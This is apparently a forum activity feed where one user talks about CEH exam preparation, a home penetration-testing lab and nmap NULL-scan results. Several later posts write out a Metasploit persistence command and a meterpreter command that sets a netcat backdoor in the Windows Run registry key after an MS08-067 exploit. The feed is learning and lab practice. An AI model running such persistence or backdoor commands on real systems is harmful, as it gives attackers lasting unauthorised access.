Dalobo

Yes, I have the pro version. Started it today.

Dalobo

Thank you.  🙂

I passed!  ;D

Now on to my elearnsecurity.com stuff.  🙂

Dalobo

I spent about 3 hours on the test and then about 30 minutes on review. I did not feel rushed and I did take my time. I passed very nicely. 🙂

My experience:

The test was not really that hard, but then I have done my due diligence. What makes it “hard” is just the fact that there is a lot of stuff to memorize.

I removed my comments – no…[Read more]

I take my CEH this Friday.

After that I have 60 hours of lab time at elearnsecurity.com I might take the eCPPT, but since I bought the labs in Jan, I will not have much time to study/practice before the cert would have to be taken. I do not plan to be a full blown pentester, so I am not to worried if I do not pass or get the eCPPT. It is the…[Read more]

I take my test this Friday at 9 A.M.

I am guessing it is like any of the other tests I have taken. I hope it is not as hard as I think it is…

I have put a huge amount of time into studying. I feel prepared.

Wish me luck!

While not directly related to the CEH, Security Now! http://www.grc.com/sn is a great security podcast. It helped me to ace my Security + certification. There is a lot of good information in there on encryption, DDOS protection (He was DDOS many many years ago), how TCP works at each layer, etc. There is over 6 years of podcasts there. 1 per week. They…[Read more]

Congrats. I am glad to hear you did not think it was as hard as you had heard. This is comforting as I just got my voucher and will be scheduling my test next week! This certification is to expensive to fail!  😮

What I used to study:
1. AIO book – read cover to cover and note carded highlighted points that were new to me. I went back and…[Read more]

You have to have a supervisor vouch for your two years. Also, you will need to have a non free email address to apply. No hotmail or gmail, you have to have a business email address such as jdoe@microsoft.com or jdoe@ibm.com, etc.

Dalobo

#1 Good question. I will be doing more testing this weekend. I think it might be the VM I am using so I am going to try it on a different VM.

#6 I have done a packet capture and I get this:

192.168.1.10 -> 192.168.1.15 TCP MICROSOFT-DS
See attached.

Microsoft-DS is a port used ever since Windows 2000 was introduced. It is used for file sharing.…

[Read more]

That is what I figured… show me the money! I am not sure why they charge so much for the certs, let alone an application fee, other then to pad their pockets.

Dalobo

#1 I am not sure what I am doing wrong I just get a blank screen. I am going to try this on a different Linux VM and see if that changes things.

#2/3/11 I am going to load up Windows 2000 and give it try against it. I am doing these on VM’s in an ESX environment, but I would not think that would cause any issues. I am guessing it will work on…[Read more]

#1 – Thank you.  I did try it and it did not work for me. I have been having issues with getting nc to work right.

#2 – I do not have a host based firewall on these machines. I can send a packet capture for you to look at if you want. I have several websites that back what I am seeing, including a Cisco page. I can dig that url up if you…[Read more]

Thanks.  I thought netcat was a way for admins to administer their boxes, without using RDP.  While I understand that is kind of silly for them to do, I just thought that was the “legitimate” purpose of netcat. To be honest, as a pentester, I think I would rather have a meterpreter connection then a netcat connection.

I did have issues where t…[Read more]

I still can’t get netcat to connect without a user being logged in.

I did give the persistence a try and can now have meterprrter call home whenever I lose the sessions.  🙂

I used run persistence -S -A -X -i 10 -p 445 -r 192.168.1.10

I am still lost on how an admin would use netcat to control a server. If he has to log into Windows to  be a…[Read more]

OK.  I redid this and I am nt authority, and the reboot command worked without having me log into the victim as admin.

I am still unable to connect using netcat.

I set the following key using this command

meterpreter > reg setval -k HKLMsoftwaremicrosoftwindowscurrentversionRUN -v BackDoor -d c:windowssystem32nc.exe” -L -d -p 1234 -e…[Read more]

No, I did not.  I used the MS08-67 to own the box.  When I typed shell, and then whoami – I think I  got administrator. That would make sense. I was not NT Authority.

I will have to try this again, but see about getting NT Authority. I will let you know once I have time to work on it again

Thank you Dark_Knight.

Dalobo

When I scan my router, it works correctly.  Turning telnet on and then doing a Null scan illicit no RST packet. That means it is open, and it does show up as open.

PORT    STATE SERVICE
23/tcp  open  telnet

So Windows should always show open | filtered or “All open” -> Hence the does not work with Windows

The Linux that is running in Meta…[Read more]

Quote:
No matter what OS I scan, RST packets ARE returned. Also, no ports are shown as open on any box, even when there ARE open ports.
/quote]

Windows:
I have all the normal Windows ports open as well as 80 on the server.
When I do the Null scan, Windows sends RST packets, but I get the open | filtered output, but no ports listed as…[Read more]

These three scan types are exactly the same in behavior except for the TCP flags set in probe packets. If a RST packet is received, the port is considered closed, while no response means it is open|filtered. The port is marked filtered if an ICMP unreachable error (type 3, code 1, 2, 3, 9, 10, or 13) is received.

I am getting an open | filtered…[Read more]